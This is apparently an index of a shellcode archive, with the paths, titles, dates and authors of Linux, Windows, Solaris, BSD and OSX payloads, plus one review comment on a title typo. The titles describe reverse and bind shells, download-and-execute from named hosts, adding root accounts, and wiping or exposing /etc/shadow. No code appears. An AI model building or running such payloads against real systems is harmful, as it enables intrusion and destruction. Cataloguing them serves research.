163 13405 shellcodes/linux_x86/13405.c Linux/x86 - _exit(1) Shellcode (7 bytes) 2005-11-09 Charles Stevenson shellcode linux_x86
164 13406 shellcodes/linux_x86/13406.c Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes) 2005-11-09 Charles Stevenson shellcode linux_x86
165 13407 shellcodes/linux_x86/13407.c Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes) 2005-11-09 Charles Stevenson shellcode linux_x86
166 13408 shellcodes/linux_x86/13408.c Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes) Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes) 2005-11-04 phar shellcode linux_x86
167 13409 shellcodes/linux_x86/13409.c Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes) 2005-09-15 c0ntex shellcode linux_x86
168 13410 shellcodes/linux_x86/13410.s Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2) 2005-09-09 xort shellcode linux_x86
169 13411 shellcodes/linux_x86/13411.c Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1) 2005-09-08 xort shellcode linux_x86
170 13412 shellcodes/linux_x86/13412.c Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes) 2005-09-04 BaCkSpAcE shellcode linux_x86
171 13413 shellcodes/linux_x86/13413.c Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes) 2005-08-25 amnesia shellcode linux_x86
172 13414 shellcodes/linux_x86/13414.c Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes) 2005-08-19 c0ntex shellcode linux_x86
173 13415 shellcodes/linux_x86/13415.c Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes) 2005-07-11 Okti shellcode linux_x86
174 13416 shellcodes/linux_x86/13416.txt Linux/x86 - upload + exec Shellcode (189 bytes) 2005-06-19 cybertronic shellcode linux_x86
175 13417 shellcodes/linux_x86/13417.c Linux/x86 - setreuid() + execve() Shellcode (31 bytes) 2004-12-26 oc192 shellcode linux_x86
176 13418 shellcodes/linux_x86/13418.c Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes) 2004-12-22 xort shellcode linux_x86
177 13419 shellcodes/linux_x86/13419.c Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes) Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes) 2004-12-22 xort shellcode linux_x86
178 13420 shellcodes/linux_x86/13420.c Linux/x86 - Self-Modifying Radical Shellcode (70 bytes) 2004-12-22 xort shellcode linux_x86
179 13421 shellcodes/linux_x86/13421.c Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes) 2004-12-22 xort shellcode linux_x86
180 13422 shellcodes/linux_x86/13422.c Linux/x86 - execve() Shellcode (23 bytes) 2004-11-15 marcetam shellcode linux_x86
181 13423 shellcodes/linux_x86/13423.c Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes) 2004-11-15 zasta shellcode linux_x86
182 13424 shellcodes/linux_x86/13424.txt Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes) 2004-09-26 RaiSe shellcode linux_x86
183 13425 shellcodes/linux_x86/13425.c Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes) Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes) 2004-09-26 anathema shellcode linux_x86
184 13426 shellcodes/bsd_x86/13426.c BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes) 2004-09-26 dev0id shellcode bsd_x86
185 13427 shellcodes/linux_x86/13427.c Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes) 2004-09-26 Tora shellcode linux_x86
186 13428 shellcodes/linux_x86/13428.c Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
190 13432 shellcodes/linux_x86/13432.c Linux/x86 - Execute At Shared Memory Shellcode (50 bytes) 2004-09-26 sloth shellcode linux_x86
191 13433 shellcodes/linux_x86/13433.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) 2004-09-26 UnboundeD shellcode linux_x86
192 13434 shellcodes/linux_x86/13434.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes) 2004-09-26 dev0id shellcode linux_x86
193 13435 shellcodes/linux_x86/13435.c Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes) Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes) 2004-09-26 hts shellcode linux_x86
194 13436 shellcodes/linux_x86/13436.c Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes) 2004-09-26 lamagra shellcode linux_x86
195 13437 shellcodes/linux_x86/13437.c Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
196 13438 shellcodes/linux_x86/13438.c Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes) 2004-09-26 RaiSe shellcode linux_x86
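Review bot: the new title for 13435 introduces a typo, "Telnet Shel Shellcode", that the old title did not have; it should read "Telnet Shell Shellcode". The same title also writes the endpoint as "(200.182.207.235/TCP)" with no port, while other reverse-shell rows use address:port/TCP (for example 13393, "127.0.0.1:31337/TCP"). Either add the port if the source file states one or drop the "/TCP" suffix from the address so the field is not read as a port specification.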
212 13453 shellcodes/bsd_x86/13453.c BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes) 2004-09-12 dev0id shellcode bsd_x86
213 13454 shellcodes/linux_x86/13454.c Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes) 2004-09-12 preedator shellcode linux_x86
214 13455 shellcodes/linux_x86/13455.c Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
215 13456 shellcodes/linux_x86/13456.c Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes) 2004-09-12 anonymous shellcode linux_x86
216 13457 shellcodes/linux_x86/13457.c Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes) Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes) 2004-09-12 anonymous shellcode linux_x86
217 13458 shellcodes/linux_x86/13458.c Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes) 2001-05-07 Marco Ivaldi shellcode linux_x86
218 13460 shellcodes/linux_x86/13460.c Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes) 2000-08-08 anonymous shellcode linux_x86
219 13461 shellcodes/linux_x86/13461.c Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes) 2000-08-07 anonymous shellcode linux_x86
220 13462 shellcodes/linux_x86/13462.c Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes) 2000-08-07 anonymous shellcode linux_x86
221 13463 shellcodes/linux_x86-64/13463.c Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) 2009-05-18 evil.xi4oyu shellcode linux_x86-64
238 13480 shellcodes/osx_ppc/13480.c OSX/PPC - Add Root User (r00t) Shellcode (219 bytes) 2004-09-26 B-r00t shellcode osx_ppc
239 13481 shellcodes/osx_ppc/13481.c OSX/PPC - execve(/bin/sh) Shellcode (72 bytes) 2004-09-26 B-r00t shellcode osx_ppc
240 13482 shellcodes/osx_ppc/13482.c OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes) 2004-09-26 B-r00t shellcode osx_ppc
241 13483 shellcodes/osx_ppc/13483.c OSX/PPC - Reboot Shellcode (28 bytes) OSX/PPC - Reboot() Shellcode (28 bytes) 2004-09-26 B-r00t shellcode osx_ppc
242 13484 shellcodes/osx_ppc/13484.c OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes) 2004-09-26 B-r00t shellcode osx_ppc
243 13485 shellcodes/osx_ppc/13485.c OSX/PPC - Create /tmp/suid Shellcode (122 bytes) 2004-09-26 B-r00t shellcode osx_ppc
244 13486 shellcodes/osx_ppc/13486.c OSX/PPC - Simple write() Shellcode (75 bytes) 2004-09-26 B-r00t shellcode osx_ppc
245 13487 shellcodes/osx_ppc/13487.c OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes) 2004-09-26 B-r00t shellcode osx_ppc
246 13488 shellcodes/sco_x86/13488.c SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes) 2005-11-30 p. minervini shellcode sco_x86
247 13489 shellcodes/solaris_mips/13489.c Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes) Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes) 2006-11-21 xort shellcode solaris_mips
248 13490 shellcodes/solaris_sparc/13490.c Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes) Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes) 2006-10-21 bunker shellcode solaris_sparc
249 13491 shellcodes/generator/13491.c Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator) 2006-07-21 xort shellcode generator
250 13492 shellcodes/solaris_sparc/13492.c Solaris/SPARC - setreuid + execve() Shellcode (56 bytes) Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes) 2005-11-20 lhall shellcode solaris_sparc
251 13493 shellcodes/solaris_sparc/13493.c Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes) 2005-11-20 lhall shellcode solaris_sparc
252 13494 shellcodes/solaris_sparc/13494.txt Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes) 2004-09-26 LSD-PLaNET shellcode solaris_sparc
253 13495 shellcodes/solaris_sparc/13495.c Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) 2004-09-26 Claes M. Nyberg shellcode solaris_sparc
254 13496 shellcodes/solaris_sparc/13496.c Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) 2004-09-26 Claes M. Nyberg shellcode solaris_sparc
255 13497 shellcodes/solaris_sparc/13497.txt Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes) 2000-11-19 dopesquad.net shellcode solaris_sparc
256 13498 shellcodes/generator/13498.php Solaris/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-16 Jonathan Salwan shellcode generator
257 13499 shellcodes/solaris_x86/13499.c Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes) Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes) 2008-12-02 sm4x shellcode solaris_x86
258 13500 shellcodes/solaris_x86/13500.c Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes) 2008-12-02 sm4x shellcode solaris_x86
259 13501 shellcodes/solaris_x86/13501.txt Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) 2004-09-26 anonymous shellcode solaris_x86
260 13502 shellcodes/solaris_x86/13502.txt Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) 2004-09-26 anonymous shellcode solaris_x86
261 13503 shellcodes/unixware/13503.txt UnixWare - execve(/bin/sh) Shellcode (95 bytes) 2004-09-26 K2 shellcode unixware
262 13504 shellcodes/windows_x86/13504.asm Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode 2009-07-27 Skylined shellcode windows_x86
263 13505 shellcodes/windows_x86/13505.c Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes) Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes) 2009-07-17 Stack shellcode windows_x86
264 13507 shellcodes/windows_x86/13507.txt Windows x86 - Egg Omelet SEH Shellcode Windows/x86 - Egg Omelet SEH Shellcode 2009-03-16 Skylined shellcode windows_x86
265 13508 shellcodes/windows_x86/13508.asm Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes) Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes) 2009-02-27 DATA_SNIPER shellcode windows_x86
266 13509 shellcodes/windows_x86/13509.c Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes) Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes) 2009-02-24 Koshi shellcode windows_x86
267 13510 shellcodes/windows_x86/13510.c Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes) Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes) 2009-02-20 Stack shellcode windows_x86
268 13511 shellcodes/windows_x86/13511.c Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes) Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes) 2009-02-03 Stack shellcode windows_x86
269 13512 shellcodes/windows_x86/13512.c Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes) Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes) 2008-09-03 Koshi shellcode windows_x86
270 13513 shellcodes/windows_x86/13513.c Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes) Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes) 2008-09-03 Koshi shellcode windows_x86
271 13514 shellcodes/windows_x86/13514.asm Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode 2008-08-25 loco shellcode windows_x86
272 13515 shellcodes/generator/13515.pl Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator) Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator) 2008-03-14 YAG KOHHA shellcode generator
273 13516 shellcodes/windows_x86/13516.asm Windows x86 - Download File + Execute Shellcode (192 bytes) Windows/x86 - Download File + Execute Shellcode (192 bytes) 2007-06-27 czy shellcode windows_x86
274 13517 shellcodes/windows_x86/13517.asm Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes) Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes) 2007-06-14 Weiss shellcode windows_x86
275 13518 shellcodes/windows_x86/13518.c Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes) Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes) 2007-05-31 ex-pb shellcode windows_x86
276 13519 shellcodes/windows_x86/13519.c Windows SP1/SP2 x86 - Beep Shellcode (35 bytes) Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes) 2006-04-14 xnull shellcode windows_x86
277 13520 shellcodes/windows_x86/13520.c Windows XP SP2 x86 - MessageBox Shellcode (110 bytes) Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes) 2006-01-24 Omega7 shellcode windows_x86
278 13521 shellcodes/windows_x86/13521.asm Windows x86 - Command WinExec() Shellcode (104+ bytes) Windows/x86 - Command WinExec() Shellcode (104+ bytes) 2006-01-24 Weiss shellcode windows_x86
279 13522 shellcodes/windows_x86/13522.c Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes) Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes) 2005-12-23 darkeagle shellcode windows_x86
280 13523 shellcodes/windows_x86/13523.c Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes) Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes) 2005-10-28 darkeagle shellcode windows_x86
281 13524 shellcodes/windows_x86/13524.txt Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes) Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes) 2005-08-16 Matthieu Suiche shellcode windows_x86
282 13525 shellcodes/windows_x86/13525.c Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes) Windows (9x/NT/2000/XP) - PEB method Shellcode (29 bytes) 2005-07-26 loco shellcode windows_x86
283 13526 shellcodes/windows_x86/13526.c Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes) Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes) 2005-01-26 twoci shellcode windows_x86
284 13527 shellcodes/windows_x86/13527.c Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes) Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes) 2005-01-09 oc192 shellcode windows_x86
285 13528 shellcodes/generator/13528.c Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator) Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator) 2004-10-25 lion shellcode generator
286 13529 shellcodes/windows_x86/13529.c Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes) Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes) 2004-10-25 lion shellcode windows_x86
287 13530 shellcodes/windows_x86/13530.asm Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode 2004-09-26 Peter Winter-Smith shellcode windows_x86
288 13531 shellcodes/windows_x86/13531.c Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes) Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes) 2004-09-26 silicon shellcode windows_x86
289 13532 shellcodes/windows_x86/13532.asm Windows - DCOM RPC2 Universal Shellcode 2003-10-09 anonymous shellcode windows_x86
290 13533 shellcodes/windows_x86-64/13533.asm Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) 2006-08-07 Weiss shellcode windows_x86-64
291 13548 shellcodes/linux_x86/13548.asm Linux/x86 - Kill All Processes Shellcode (9 bytes) 2010-01-14 root@thegibson shellcode linux_x86
292 13549 shellcodes/linux_x86/13549.c Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes) Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes) 2009-12-04 ka0x shellcode linux_x86
293 13550 shellcodes/linux_x86/13550.c Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes) 2009-12-04 ka0x shellcode linux_x86
294 13551 shellcodes/linux_x86/13551.c Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes) 2009-12-04 ka0x shellcode linux_x86
295 13553 shellcodes/linux_x86/13553.c Linux/x86 - execve() Shellcode (51 bytes) 2009-12-04 fl0 fl0w shellcode linux_x86
296 13560 shellcodes/windows/13560.txt Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes) Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes) 2009-12-14 anonymous shellcode windows
297 13563 shellcodes/linux_x86/13563.asm Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) 2010-01-15 root@thegibson shellcode linux_x86
298 13565 shellcodes/windows_x86/13565.asm Windows XP SP3 x86 - ShellExecuteA Shellcode Windows/x86 (XP SP3) - ShellExecuteA Shellcode 2009-12-19 sinn3r shellcode windows_x86
299 13566 shellcodes/linux_x86/13566.c Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode 2009-12-19 mr_me shellcode linux_x86
300 13569 shellcodes/windows_x86/13569.asm Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode 2009-12-24 sinn3r shellcode windows_x86
301 13570 shellcodes/freebsd_x86/13570.c FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes) 2009-12-24 sbz shellcode freebsd_x86
302 13571 shellcodes/windows_x86/13571.c Windows XP SP2 x86 - calc.exe Shellcode (45 bytes) Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes) 2009-12-24 Stack shellcode windows_x86
303 13572 shellcodes/linux_x86/13572.c Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes) 2009-12-24 $andman shellcode linux_x86
304 13574 shellcodes/windows_x86/13574.c Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes) Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes) 2009-12-28 AnTi SeCuRe shellcode windows_x86
305 13576 shellcodes/linux_x86/13576.asm Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes) 2010-01-16 root@thegibson shellcode linux_x86
306 13577 shellcodes/linux_x86/13577.txt Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes) 2009-12-30 root@thegibson shellcode linux_x86
307 13578 shellcodes/linux_x86/13578.txt Linux/x86 - Fork Bomb Shellcode (6 bytes) (1) 2009-12-30 root@thegibson shellcode linux_x86
308 13579 shellcodes/linux_x86/13579.c Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes) 2009-12-31 $andman shellcode linux_x86
309 13581 shellcodes/windows/13581.txt Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes) Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes) 2010-01-03 Aodrulez shellcode windows
310 13582 shellcodes/windows/13582.txt Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes) Windows (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes) 2010-01-03 Aodrulez shellcode windows
311 13586 shellcodes/linux_x86/13586.txt Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) 2010-01-08 root@thegibson shellcode linux_x86
312 13595 shellcodes/windows_x86/13595.c Windows XP SP2 x86 (French) - calc Shellcode (19 bytes) Windows/x86 (XP SP2) (French) - calc Shellcode (19 bytes) 2010-01-20 SkuLL-HackeR shellcode windows_x86
313 13599 shellcodes/linux_x86/13599.txt Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
314 13600 shellcodes/linux_x86/13600.txt Linux/x86 - ip6tables -F Shellcode (47 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
315 13601 shellcodes/linux_x86/13601.txt Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
316 13602 shellcodes/linux_x86/13602.txt Linux/i686 - pacman -R <package> Shellcode (59 bytes) 2010-01-24 Jonathan Salwan shellcode linux_x86
317 13609 shellcodes/linux_x86/13609.c Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes) 2010-02-09 fb1h2s shellcode linux_x86
318 13614 shellcodes/windows_x86/13614.c Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes) Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
319 13615 shellcodes/windows_x86/13615.c Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes) Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes) 2010-02-10 Hellcode Research shellcode windows_x86
320 13627 shellcodes/linux_x86/13627.c Linux/x86 - execve(/bin/sh) Shellcode (8 bytes) 2010-02-23 JungHoon Shin shellcode linux_x86
321 13628 shellcodes/linux_x86/13628.c Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2) 2010-02-27 ipv shellcode linux_x86
322 13630 shellcodes/windows_x86/13630.c Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes) Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes) 2010-02-28 Hazem mofeed shellcode windows_x86
323 13631 shellcodes/windows_x86/13631.c Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes) Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes) 2010-03-01 Hazem mofeed shellcode windows_x86
324 13632 shellcodes/linux_x86/13632.c Linux/x86 - Disable modsecurity Shellcode (64 bytes) 2010-03-04 sekfault shellcode linux_x86
325 13635 shellcodes/windows_x86/13635.txt Windows x86 - JITed Stage-0 Shellcode Windows/x86 - JITed Stage-0 Shellcode 2010-03-07 Alexey Sintsov shellcode windows_x86
326 13636 shellcodes/windows_x86/13636.c Windows x86 - JITed exec notepad Shellcode Windows/x86 - JITed exec notepad Shellcode 2010-03-08 Alexey Sintsov shellcode windows_x86
327 13639 shellcodes/windows_x86/13639.c Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes) Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes) 2010-03-11 Stoke shellcode windows_x86
328 13642 shellcodes/windows_x86/13642.txt Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes) Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes) 2010-03-18 czy shellcode windows_x86
329 13645 shellcodes/windows/13645.c Windows - Egghunter JITed Stage-0 Shellcode Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode 2010-03-20 Alexey Sintsov shellcode windows
330 13647 shellcodes/windows_x86/13647.txt Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) Windows/x86 (XP SP3) (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) 2010-03-24 lord Kelvin shellcode windows_x86
331 13648 shellcodes/windows_x86/13648.rb Windows x86 - MessageBox Shellcode (Metasploit) Windows/x86 - MessageBox Shellcode (Metasploit) 2010-03-24 corelanc0d3r shellcode windows_x86
332 13649 shellcodes/windows/13649.txt Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode 2010-03-27 Alexey Sintsov shellcode windows
333 13661 shellcodes/linux_x86/13661.txt Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode 2010-04-02 anonymous shellcode linux_x86
334 13669 shellcodes/linux_x86/13669.c Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) 2010-04-14 Magnefikko shellcode linux_x86
335 13670 shellcodes/linux_x86/13670.c Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) 2010-04-14 Magnefikko shellcode linux_x86
336 13671 shellcodes/linux_x86/13671.c Linux/x86 - DoS Badger Game Shellcode (6 bytes) 2010-04-14 Magnefikko shellcode linux_x86
337 13673 shellcodes/linux_x86/13673.c Linux/x86 - DoS SLoc Shellcode (55 bytes) 2010-04-14 Magnefikko shellcode linux_x86
338 13675 shellcodes/linux_x86/13675.c Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes) Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes) 2010-04-17 Magnefikko shellcode linux_x86
339 13676 shellcodes/linux_x86/13676.c Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes) 2010-04-18 sm0k shellcode linux_x86
340 13677 shellcodes/linux_x86/13677.c Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes) 2010-04-19 Magnefikko shellcode linux_x86
341 13679 shellcodes/generator/13679.py Linux - write() + exit(0) Shellcode (Generator) 2010-04-20 Stoke shellcode generator
342 13680 shellcodes/linux_x86/13680.c Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes) 2010-04-21 Jonathan Salwan shellcode linux_x86
343 13681 shellcodes/linux_x86/13681.c Linux/x86 - Fork Bomb Shellcode (6 bytes) (2) 2010-04-21 Jonathan Salwan shellcode linux_x86
344 13682 shellcodes/linux_x86/13682.c Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes) Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes) 2010-04-22 Magnefikko shellcode linux_x86
